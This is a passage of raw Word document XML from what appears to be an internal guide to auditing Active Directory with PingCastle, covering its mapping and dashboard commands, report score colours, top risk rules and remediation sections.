          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>Wait for the scan to complete (1–5 minutes).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="2DE7BD48" w14:paraId="2EAA0307" w14:textId="22560D72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">Open the generated </w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>.html</w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve"> report in the same folder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DEDD1CD" w:rsidP="5E1249AA" w:rsidRDefault="5DEDD1CD" w14:paraId="64A281DD" w14:textId="367D59C3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:after="281"/>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active Directory Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DEDD1CD" w:rsidP="5E1249AA" w:rsidRDefault="5DEDD1CD" w14:paraId="5963CF26" w14:textId="1B76CE1E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>.\PingCastle.exe --mapping --server &lt;domain&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DEDD1CD" w:rsidP="5E1249AA" w:rsidRDefault="5DEDD1CD" w14:paraId="49823E37" w14:textId="653821D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>Visualizes domain trust relationships and AD structure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DEDD1CD" w:rsidP="5E1249AA" w:rsidRDefault="5DEDD1CD" w14:paraId="11D3DFC8" w14:textId="7AB9B471">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:after="281"/>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Report Consolidation Over Time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DEDD1CD" w:rsidP="5E1249AA" w:rsidRDefault="5DEDD1CD" w14:paraId="4EC0E558" w14:textId="23AE21EE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>.\PingCastle.exe --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>consoledashboard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="5DEDD1CD" w:rsidP="5E1249AA" w:rsidRDefault="5DEDD1CD" w14:paraId="5D872990" w14:textId="6DEBEE88">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>Track health check scores over time by consolidating multiple reports.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E1249AA" w:rsidP="5E1249AA" w:rsidRDefault="5E1249AA" w14:paraId="4B7FE086" w14:textId="26C65FF0">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="009D457E" w14:paraId="3FE29FBE" w14:textId="16DD1417"/>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="70F93AA8" w14:paraId="4F9F3DCD" w14:textId="19775885">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="7668DC7D" w:rsidR="2DE7BD48">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Review the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="7668DC7D" w:rsidR="2DE7BD48">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PingCastle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="7668DC7D" w:rsidR="2DE7BD48">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Report</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="2DE7BD48" w14:paraId="43527299" w14:textId="7C516739">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:after="281"/>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Global Score</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="2DE7BD48" w14:paraId="497C4B20" w14:textId="44A8B7E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Red (Critical)</w:t>
      </w:r>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve"> – High risk issues requiring urgent action</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="2DE7BD48" w14:paraId="3B435FC1" w14:textId="03D50700">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Orange (High)</w:t>
      </w:r>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Important misconfigurations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="2DE7BD48" w14:paraId="01DFF892" w14:textId="1666B847">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Yellow (Medium)</w:t>
      </w:r>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Areas for improvement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="2DE7BD48" w14:paraId="6F7537EC" w14:textId="6A91AFCC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Green (Low)</w:t>
      </w:r>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Low or no risk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="2DE7BD48" w14:paraId="4F1D7382" w14:textId="43E2E458">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:after="281"/>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Top Risk Rules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="2DE7BD48" w14:paraId="1AC2BEF6" w14:textId="71A24FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>Kerberos Delegation Issues</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="2DE7BD48" w14:paraId="7F21BCCA" w14:textId="72BDBF7E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>Unconstrained Delegation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="2DE7BD48" w14:paraId="5B19D783" w14:textId="615D7CD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>Stale Admin Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="2DE7BD48" w14:paraId="3476B91F" w14:textId="6B1B448E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>Passwords Not Required</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="2DE7BD48" w14:paraId="69742EC8" w14:textId="69994F1D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>Unsupported Operating Systems</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="2DE7BD48" w14:paraId="2FCDF34D" w14:textId="4BE5F594">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:after="281"/>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Technical Checks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="2DE7BD48" w14:paraId="3B826A71" w14:textId="2BADAF27">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>Trust relationships</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="2DE7BD48" w14:paraId="7C5E06F8" w14:textId="7EE8DBB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>Privileged group memberships</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="2DE7BD48" w14:paraId="03620B7D" w14:textId="15214E75">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>GPO security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="2DE7BD48" w14:paraId="09BE0A43" w14:textId="5598DDA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>Domain password policies</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="2DE7BD48" w14:paraId="47B1138A" w14:textId="66284E1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>DC security baselines</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="2DE7BD48" w14:paraId="01F61227" w14:textId="5AF33F08">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:after="281"/>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="2DE7BD48" w14:paraId="65852C02" w14:textId="219BA0C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>Each issue includes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="2DE7BD48" w14:paraId="4AA7CD69" w14:textId="0A5B33EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="2DE7BD48" w14:paraId="45EFFBDE" w14:textId="4A6CDDA2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>Remediation steps</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="2DE7BD48" w14:paraId="1BCDDC2B" w14:textId="3163DA2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>Risk context</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="2DE7BD48" w14:paraId="4A80DDC7" w14:textId="4DCA20AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:t>🛠️ Optional: Run Additional Scans</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="009D457E" w14:paraId="1C561C32" w14:textId="1A6EEEB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="1E149EC1" w:rsidRDefault="009D457E" w14:paraId="5D992794" w14:textId="5DA883C6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="1E149EC1" w:rsidRDefault="009D457E" w14:paraId="6BECC438" w14:textId="4B8EEE02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="1E149EC1" w:rsidRDefault="009D457E" w14:paraId="2438151B" w14:textId="54E33213">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="1E149EC1" w:rsidRDefault="009D457E" w14:paraId="425A624D" w14:textId="1FCBB10F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidRDefault="009D457E" w14:paraId="2C078E63" w14:textId="58640FBB"/>
    <w:sectPr w:rsidR="009D457E">
      <w:headerReference w:type="default" r:id="rId16"/>
      <w:footerReference w:type="default" r:id="rId1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92DC0" w:rsidRDefault="00392DC0" w14:paraId="5CA3A8A8" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00392DC0" w:rsidRDefault="00392DC0" w14:paraId="03A5DB7B" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w:rsidR="00392DC0" w:rsidRDefault="00392DC0" w14:paraId="4B05702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68DC7D" w:rsidTr="7668DC7D" w14:paraId="5F2F6AA8" w14:textId="77777777">
      <w:trPr>
        <w:trHeight w:val="300"/>
